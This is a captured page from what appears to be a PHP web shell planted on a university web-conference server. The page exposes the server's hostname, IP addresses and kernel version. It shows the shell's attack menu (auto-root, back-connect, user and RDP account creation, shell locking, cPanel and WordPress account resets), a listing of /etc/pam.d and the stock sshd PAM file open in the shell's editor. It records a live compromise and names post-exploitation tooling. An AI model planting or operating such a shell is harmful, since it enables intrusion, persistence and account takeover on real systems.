Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.54.136
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
pam.d /
[ HOME SHELL ]
Name
Size
Permission
Action
atd
250
B
-rw-r--r--
chfn
384
B
-rw-r--r--
chpasswd
92
B
-rw-r--r--
chsh
581
B
-rw-r--r--
common-account
1.18
KB
-rw-r--r--
common-auth
1.21
KB
-rw-r--r--
common-password
1.41
KB
-rw-r--r--
common-session
1.44
KB
-rw-r--r--
common-session-noninteractive
1.4
KB
-rw-r--r--
cron
606
B
-rw-r--r--
login
4.03
KB
-rw-r--r--
newusers
92
B
-rw-r--r--
other
520
B
-rw-r--r--
passwd
92
B
-rw-r--r--
polkit-1
270
B
-rw-r--r--
runuser
143
B
-rw-r--r--
runuser-l
138
B
-rw-r--r--
sshd
2.08
KB
-rw-r--r--
su
2.2
KB
-rw-r--r--
su-l
137
B
-rw-r--r--
sudo
239
B
-rw-r--r--
systemd-user
317
B
-rw-r--r--
vmtoolsd
119
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sshd
# PAM configuration for the Secure Shell service # Standard Un*x authentication. @include common-auth # Disallow non-root logins when /etc/nologin exists. account required pam_nologin.so # Uncomment and edit /etc/security/access.conf if you need to set complex # access limits that are hard to express in sshd_config. # account required pam_access.so # Standard Un*x authorization. @include common-account # SELinux needs to be the first session rule. This ensures that any # lingering context has been cleared. Without this it is possible that a # module could execute code in the wrong domain. session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close # Set the loginuid process attribute. session required pam_loginuid.so # Create a new session keyring. session optional pam_keyinit.so force revoke # Standard Un*x session setup and teardown. @include common-session # Print the message of the day upon successful login. # This includes a dynamically generated part from /run/motd.dynamic # and a static (admin-editable) part from /etc/motd. session optional pam_motd.so motd=/run/motd.dynamic session optional pam_motd.so noupdate # Print the status of the user's mailbox upon successful login. session optional pam_mail.so standard noenv # [1] # Set up user limits from /etc/security/limits.conf. session required pam_limits.so # Read environment variables from /etc/environment and # /etc/security/pam_env.conf. session required pam_env.so # [1] # In Debian 4.0 (etch), locale-related environment variables were moved to # /etc/default/locale, so read that as well. session required pam_env.so user_readenv=1 envfile=/etc/default/locale # SELinux needs to intervene at login time to ensure that the process starts # in the proper default security context. Only sessions which are intended # to run in the user's context should be run after this. session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open # Standard Un*x password updating. @include common-password
Close